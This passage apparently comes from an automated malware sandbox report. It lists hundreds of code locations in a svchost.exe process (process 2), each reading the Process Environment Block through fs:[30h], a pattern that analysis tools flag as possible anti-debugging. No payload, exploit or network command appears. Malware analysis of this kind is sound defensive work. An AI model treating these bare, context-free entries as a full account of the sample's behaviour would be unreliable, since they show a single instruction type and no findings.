                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
